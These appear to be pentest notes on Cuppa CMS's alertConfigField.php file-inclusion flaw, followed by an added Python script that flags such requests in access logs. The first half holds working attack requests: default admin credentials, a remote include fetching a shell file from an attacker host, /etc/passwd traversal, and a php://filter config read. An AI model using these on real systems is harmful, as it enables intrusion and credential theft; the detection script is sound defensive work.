Cuppa CMS
http://10.11.1.1/administrator/
Default creds - admin:admin
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://kaliIP/shelly.txt? #LFI
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd # Path traversal
#Reading /etc/passwd
http://10.11.1.1/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
#Find config files and decode base64 output
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
#Same with curl
curl -s --data-urlencode urlConfig=../../../../../../../etc/passwd http://10.11.1.116/administrator/alerts/alertConfigField.php
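#Detecting these requests in access logs (added example, not part of the original notes)
This script scans web-server access-log lines for hits on alertConfigField.php and flags urlConfig values that carry a traversal sequence, a stream wrapper such as php://filter, or a remote URL. The log lines, IP addresses and the benign value `defaultField` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (documentation IP ranges), not from a real server.
P = "/administrator/alerts/alertConfigField.php"
SAMPLE_LOG = [
    f'192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET {P}?urlConfig=../../../../etc/passwd HTTP/1.1" 200 1532',
    f'192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET {P}?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php HTTP/1.1" 200 2210',
    f'192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET {P}?urlConfig=http://198.51.100.7/shelly.txt? HTTP/1.1" 200 310',
    f'192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET {P}?urlConfig=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1532',
    f'192.0.2.20 - - [01/Jan/2024:10:01:00 +0000] "POST {P} HTTP/1.1" 200 1532',
    f'192.0.2.30 - - [01/Jan/2024:10:02:00 +0000] "GET {P}?urlConfig=defaultField HTTP/1.1" 200 900',
]
REQ = re.compile(r'"(GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo repeated URL-encoding (e.g. %252e -> %2e -> .) up to `rounds` times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return the suspicious traits found in one urlConfig value."""
    v, tags = fully_decode(value), []
    scheme = re.match(r"([a-z][a-z0-9+.-]*)://", v, re.I)
    if scheme:
        remote = scheme.group(1).lower() in ("http", "https", "ftp")
        tags.append("remote-include" if remote else "stream-wrapper")
    if re.search(r"\.\.[/\\]", v):
        tags.append("traversal")
    return tags

def scan(lines):
    """Return (line_no, method, tags) for each suspicious alertConfigField.php request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQ.search(line)
        if not m:
            continue
        method, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith("/alerts/alertconfigfield.php"):
            continue
        values = parse_qs(parts.query, keep_blank_values=True).get("urlConfig", [])
        tags = [t for v in values for t in classify(v)]
        if method == "POST" and not values:
            tags.append("post-body-not-logged")  # parameter is in the body; review manually
        if tags:
            findings.append((n, method, tags))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The curl form above sends urlConfig in a POST body, which a standard access log does not record, so those requests are only flagged for review; classifying them needs request-body logging at the proxy or WAF.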